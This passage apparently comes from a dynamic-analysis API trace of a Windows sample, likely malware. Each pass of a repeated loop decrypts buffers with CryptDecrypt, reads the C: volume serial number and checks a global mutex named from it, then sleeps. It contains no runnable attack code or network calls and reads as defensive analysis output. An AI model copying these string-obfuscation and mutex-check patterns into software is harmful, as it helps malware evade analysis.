hHeap=0x26a0000) returned 1 [0141.519] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0141.519] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac2f30) returned 1 [0141.519] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0141.519] CryptDecrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0141.519] CryptDestroyKey (hKey=0xac2f30) returned 1 [0141.520] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0141.520] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2f0 [0141.520] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0x0) returned 0x102 [0141.520] CloseHandle (hObject=0x2f0) returned 1 [0141.520] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0141.520] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0141.520] Sleep (dwMilliseconds=0x3e8) [0142.783] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8900 [0142.783] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac2d70) returned 1 [0142.783] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0142.783] CryptDecrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8900, pdwDataLen=0x266fbf4 | out: pbData=0x26a8900, pdwDataLen=0x266fbf4) returned 1 [0142.783] CryptDestroyKey (hKey=0xac2d70) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a87e8 [0142.784] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a89c8 [0142.784] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0142.784] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac3030) returned 1 [0142.784] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0142.784] CryptDecrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0142.784] CryptDestroyKey (hKey=0xac3030) returned 1 [0142.784] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0142.784] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a87e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0142.784] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89c8 | out: hHeap=0x26a0000) returned 1 [0142.784] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8900 | out: hHeap=0x26a0000) returned 1 [0142.784] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.784] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a87e8 | out: hHeap=0x26a0000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0142.784] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac3170) returned 1 [0142.784] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0142.784] CryptDecrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0142.784] CryptDestroyKey (hKey=0xac3170) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0142.784] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e8 [0142.784] WaitForSingleObject (hHandle=0x2e8, dwMilliseconds=0x0) returned 0x102 [0142.784] CloseHandle (hObject=0x2e8) returned 1 [0142.784] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0142.785] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0142.785] Sleep (dwMilliseconds=0x3e8) [0144.142] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8928 [0144.142] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3330) returned 1 [0144.142] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0144.142] CryptDecrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8928, pdwDataLen=0x266fbf4 | out: pbData=0x26a8928, pdwDataLen=0x266fbf4) returned 1 [0144.142] CryptDestroyKey (hKey=0xac3330) returned 1 [0144.142] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8888 [0144.142] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8a40 [0144.142] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0144.142] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac30f0) returned 1 [0144.142] CryptSetKeyParam (hKey=0xac30f0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0144.142] CryptDecrypt (in: hKey=0xac30f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0144.142] CryptDestroyKey (hKey=0xac30f0) returned 1 [0144.142] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0144.142] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8888, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0144.142] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a40 | out: hHeap=0x26a0000) returned 1 [0144.142] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8928 | out: hHeap=0x26a0000) returned 1 [0144.142] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.143] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8888 | out: hHeap=0x26a0000) returned 1 [0144.143] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0144.143] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac3130) returned 1 [0144.143] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0144.143] CryptDecrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0144.143] CryptDestroyKey (hKey=0xac3130) returned 1 [0144.143] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0144.143] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2d8 [0144.143] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x0) returned 0x102 [0144.143] CloseHandle (hObject=0x2d8) returned 1 [0144.143] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0144.143] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0144.143] Sleep (dwMilliseconds=0x3e8) [0145.350] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8838 [0145.350] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac32b0) returned 1 [0145.350] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0145.350] CryptDecrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8838, pdwDataLen=0x266fbf4 | out: pbData=0x26a8838, pdwDataLen=0x266fbf4) returned 1 [0145.350] CryptDestroyKey (hKey=0xac32b0) returned 1 [0145.350] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8900 [0145.350] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8a40 [0145.350] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0145.350] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac34b0) returned 1 [0145.350] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0145.350] CryptDecrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0145.350] CryptDestroyKey (hKey=0xac34b0) returned 1 [0145.350] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0145.351] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8900, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0145.351] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a40 | out: hHeap=0x26a0000) returned 1 [0145.351] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8838 | out: hHeap=0x26a0000) returned 1 [0145.351] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0145.351] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8900 | out: hHeap=0x26a0000) returned 1 [0145.351] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0145.351] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac3070) returned 1 [0145.351] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0145.351] CryptDecrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0145.351] CryptDestroyKey (hKey=0xac3070) returned 1 [0145.351] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0145.351] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x304 [0145.351] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x0) returned 0x102 [0145.351] CloseHandle (hObject=0x304) returned 1 [0145.351] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0145.351] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0145.351] Sleep (dwMilliseconds=0x3e8) [0146.551] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a89c8 [0146.551] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3330) returned 1 [0146.551] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0146.551] CryptDecrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a89c8, pdwDataLen=0x266fbf4 | out: pbData=0x26a89c8, pdwDataLen=0x266fbf4) returned 1 [0146.551] CryptDestroyKey (hKey=0xac3330) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8860 [0146.551] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8b58 [0146.551] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0146.551] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac3070) returned 1 [0146.551] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0146.551] CryptDecrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0146.551] CryptDestroyKey (hKey=0xac3070) returned 1 [0146.551] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0146.551] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8860, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0146.551] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8b58 | out: hHeap=0x26a0000) returned 1 [0146.551] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89c8 | out: hHeap=0x26a0000) returned 1 [0146.551] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0146.551] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8860 | out: hHeap=0x26a0000) returned 1 [0146.551] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0146.551] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac2f70) returned 1 [0146.551] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0146.552] CryptDecrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0146.552] CryptDestroyKey (hKey=0xac2f70) returned 1 [0146.552] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0146.552] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e0 [0146.552] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0x0) returned 0x102 [0146.552] CloseHandle (hObject=0x2e0) returned 1 [0146.552] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0146.552] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0146.552] Sleep (dwMilliseconds=0x3e8) [0147.791] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a8838 [0147.791] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3330) returned 1 [0147.791] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0147.791] CryptDecrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8838, pdwDataLen=0x266fbf4 | out: pbData=0x26a8838, pdwDataLen=0x266fbf4) returned 1 [0147.791] CryptDestroyKey (hKey=0xac3330) returned 1 [0147.791] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8ab8 [0147.791] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a89f0 [0147.791] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0147.791] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac2ff0) returned 1 [0147.791] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0147.791] CryptDecrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0147.791] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0147.791] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0147.791] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8ab8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0147.791] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89f0 | out: hHeap=0x26a0000) returned 1 [0147.791] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8838 | out: hHeap=0x26a0000) returned 1 [0147.791] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0147.792] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8ab8 | out: hHeap=0x26a0000) returned 1 [0147.792] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0147.792] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac2ff0) returned 1 [0147.792] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0147.792] CryptDecrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0147.792] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0147.792] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0147.792] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2f0 [0147.792] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0x0) returned 0x102 [0147.792] CloseHandle (hObject=0x2f0) returned 1 [0147.792] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0147.792] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0147.792] Sleep (dwMilliseconds=0x3e8) [0149.082] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a87e8 [0149.082] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac2e70) returned 1 [0149.082] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0149.082] CryptDecrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a87e8, pdwDataLen=0x266fbf4 | out: pbData=0x26a87e8, pdwDataLen=0x266fbf4) returned 1 [0149.083] CryptDestroyKey (hKey=0xac2e70) returned 1 [0149.083] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8928 [0149.083] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8a90 [0149.083] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0149.083] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac30b0) returned 1 [0149.083] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0149.083] CryptDecrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0149.083] CryptDestroyKey (hKey=0xac30b0) returned 1 [0149.083] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0149.083] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8928, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0149.083] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8a90 | out: hHeap=0x26a0000) returned 1 [0149.083] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a87e8 | out: hHeap=0x26a0000) returned 1 [0149.083] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0149.083] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8928 | out: hHeap=0x26a0000) returned 1 [0149.083] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a9d40 [0149.083] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xac32f0) returned 1 [0149.083] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0149.083] CryptDecrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fc28 | out: pbData=0x26a9d40, pdwDataLen=0x266fc28) returned 1 [0149.083] CryptDestroyKey (hKey=0xac32f0) returned 1 [0149.083] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a9d88 [0149.083] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2f8 [0149.083] WaitForSingleObject (hHandle=0x2f8, dwMilliseconds=0x0) returned 0x102 [0149.083] CloseHandle (hObject=0x2f8) returned 1 [0149.084] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0149.084] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d88 | out: hHeap=0x26a0000) returned 1 [0149.084] Sleep (dwMilliseconds=0x3e8) [0150.258] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a87c0 [0150.258] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xac3430) returned 1 [0150.258] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0150.258] CryptDecrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a87c0, pdwDataLen=0x266fbf4 | out: pbData=0x26a87c0, pdwDataLen=0x266fbf4) returned 1 [0150.258] CryptDestroyKey (hKey=0xac3430) returned 1 [0150.258] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a8ae0 [0150.258] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a8b08 [0150.258] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a9d40 [0150.258] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xac2ef0) returned 1 [0150.258] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0150.258] CryptDecrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9d40, pdwDataLen=0x266fbcc | out: pbData=0x26a9d40, pdwDataLen=0x266fbcc) returned 1 [0150.258] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0150.258] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9d40 | out: hHeap=0x26a0000) returned 1 [0150.258] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a8ae0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0150.258] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8b08 | out: 